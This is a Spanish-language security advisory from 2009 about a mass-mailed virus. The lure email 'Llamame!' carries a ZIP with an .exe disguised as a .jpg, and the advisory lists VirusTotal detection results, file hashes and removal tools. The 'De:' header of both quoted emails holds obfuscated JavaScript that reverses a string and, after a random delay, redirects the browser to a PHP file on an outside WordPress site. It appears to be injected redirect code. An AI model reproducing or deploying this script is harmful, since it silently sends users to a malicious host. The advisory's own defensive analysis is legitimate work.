Nuevo virus que se recibe por mail masivo, con el asunto Llamame! y adjuntando un .ZIP que contiene un aparente .jpg

Un nuevo virus que se propaga por mail masivo, está propagandose por internet, de lo cual avisamos para evitarlo en lo posible:

Asunto:   Fwd: Llamame!
De:   $NfI=function(n){if (typeof ($NfI.list[n]) == “string”) return $NfI.list[n].split(“”).reverse().join(“”);return $NfI.list[n];};$NfI.list=[“‘php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}to:sammy.landin@%3Cdominio”>sammy.landin@<dominio destino>
Prioridad:   Normal
Opciones:   Ver encabezado completo |  Vista preliminar  | Bajar este mensaje como un archivo  | Ver detalles 
 
 
Hello, {#TO_NAME}.

July, Wednesday 16, 2009, 1:33:42 AM, you wrote:
    

> Hola.
> Te quiero con todo mi corazon y el alma. Te extrano tanto.
> Envio mi foto. Por favor, no lo muestras a su familia y  amigos.
> Muchos besos, tu amor.

Hola! Super bonita foto 🙂 Llamame: 34 079383590
—
Best regards,
{#FROM_NAME}            to:{#FROM_NAME}@{#FROM_DOMAIN}
 
 
 
 
 
Ficheros adjuntos: 
 
DC0018.zip  0 k   [ application/x-zip-compressed ]    Descargar
 
__________

 Otros llegan ligeramente distintos, cambiando destinatario (lo falsea) y remitente

Asunto:   Fwd: Llamame!!
De:   $NfI=function(n){if (typeof ($NfI.list[n]) == “string”) return $NfI.list[n].split(“”).reverse().join(“”);return $NfI.list[n];};$NfI.list=[“‘php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}to:virus666@ole.com”>virus666@ole.com
Prioridad:   Normal
Opciones:   Ver encabezado completo |  Vista preliminar  | Bajar este mensaje como un archivo  | Ver detalles 
 
 
Hello, virus666.

July, Wednesday 16, 2009, 12:50:54 AM, you wrote:
  

> Hola.
> Te quiero con todo mi corazon y el alma. Te extrano tanto.
> Envio mi foto. Por favor, no lo muestras a su familia y  amigos.
> Muchos besos, tu amor.

Hola! Super bonita foto 🙂 Llamame: 34 492040775
—
Best regards,
lagudelo      to:lagudelo@ortiz.es
 
 
_____________

Desempaquetado el ZIP aparece un fichero con un paisaje como icono, y de las siguientes caracteristicas:

nombre DC0034.jpg__________________________________________________________________________________________.exe

tamaño  31232 bytes   (25,4 el empaquetado)

El analisis actual de VirusTotal detecta:

File DC0034.jpg_______________________ received on 2009.07.17 07:00:09 (UTC)
Current status: Loading … queued waiting scanning finished NOT FOUND STOPPED
Result: 11/41 (26.83%)
 

Antivirus Version Last Update Result
a-squared 4.5.0.24 2009.07.17 –
AhnLab-V3 5.0.0.2 2009.07.16 –
AntiVir 7.9.0.220 2009.07.17 TR/Crypt.XPACK.Gen
Antiy-AVL 2.0.3.7 2009.07.17 –
Authentium 5.1.2.4 2009.07.17 W32/Heuristic-CO3!Eldorado
Avast 4.8.1335.0 2009.07.16 –
AVG 8.5.0.387 2009.07.16 –
BitDefender 7.2 2009.07.17 –
CAT-QuickHeal 10.00 2009.07.17 –
ClamAV 0.94.1 2009.07.17 –
Comodo 1677 2009.07.17 –
DrWeb 5.0.0.12182 2009.07.17 –
eSafe 7.0.17.0 2009.07.16 Suspicious File
eTrust-Vet 31.6.6621 2009.07.17 –
F-Prot 4.4.4.56 2009.07.17 W32/Heuristic-CO3!Eldorado
F-Secure 8.0.14470.0 2009.07.17 –
Fortinet 3.120.0.0 2009.07.17 –
GData 19 2009.07.17 –
Ikarus T3.1.1.64.0 2009.07.17 –
Jiangmin 11.0.800 2009.07.17 –
K7AntiVirus 7.10.794 2009.07.16 –
Kaspersky 7.0.0.125 2009.07.17 Trojan.Win32.Regrun.dgi
McAfee 5678 2009.07.16 New Malware.bx
McAfee+Artemis 5678 2009.07.16 Artemis!3D066099A4F7
McAfee-GW-Edition 6.8.5 2009.07.17 Heuristic.LooksLike.Win32.Suspicious.B
Microsoft 1.4803 2009.07.17 VirTool:Win32/Obfuscator.FO
NOD32 4252 2009.07.17 –
Norman 6.01.09 2009.07.16 –
nProtect 2009.1.8.0 2009.07.17 –
Panda 10.0.0.14 2009.07.16 –
PCTools 4.4.2.0 2009.07.16 –
Prevx 3.0 2009.07.17 –
Rising 21.38.40.00 2009.07.17 –
Sophos 4.43.0 2009.07.17 Mal/Zbot-P
Sunbelt 3.2.1858.2 2009.07.17 –
Symantec 1.4.4.12 2009.07.17 –
TheHacker 6.3.4.3.369 2009.07.16 –
TrendMicro 8.950.0.1094 2009.07.16 PAK_Generic.001
VBA32 3.12.10.8 2009.07.16 –
ViRobot 2009.7.17.1840 2009.07.17 –
VirusBuster 4.6.5.0 2009.07.16 –
Additional information
File size: 31232 bytes
MD5…: 3d066099a4f732277c4a287e15112b97
SHA1..: 88a48a8d616edd1fe8d83e21cbb25336b2e4587b
Como se ve solo es detectado actualmente por 11 de los 41 antivirus del VirusTotal  y consiguientemente una deteccion del 26,83 %; pero si de los tres de McAfee consideramos 1 bloque, queda detectado por 9 de 39, lo cual baja la detección al 23,08 %, propia de un virus incipiente, que es cuando los antivirus no lo detectan y consigue su proposito de ir infectando los ordenadores donde se ejecute

Concretamente de los antivirus mas conocidos, estos aun no lo detectan:

Avast 4.8.1335.0 2009.07.16 –
AVG 8.5.0.387 2009.07.16 –
BitDefender 7.2 2009.07.17 –
F-Secure 8.0.14470.0 2009.07.17 –
NOD32 4252 2009.07.17 –
Norman 6.01.09 2009.07.16 –
Panda 10.0.0.14 2009.07.16 –
Symantec 1.4.4.12 2009.07.17 –

Los usuarios de los mismos han de tener especial cuidado con él…
NOTAS AL RESPECTO:

Analizado el malware resulta ser una variante de los típicos “Tienes una factura pendiente” que anexaba un FAKTURA…

Implementamos su control y eliminación a partir del ELISTARA 19.05 de hoy, si bien inmediatamente ya se puede detectar y eliminar con el ELIMD5 introduciendole indistintamente cualquiera de los dos hashes indicados:

3d066099a4f732277c4a287e15112b97
88a48a8d616edd1fe8d83e21cbb25336b2e4587b

Confiamos puedan evitar su ejecución, y sino, ya saben el remedio.

saludos

ms, 17-7-2009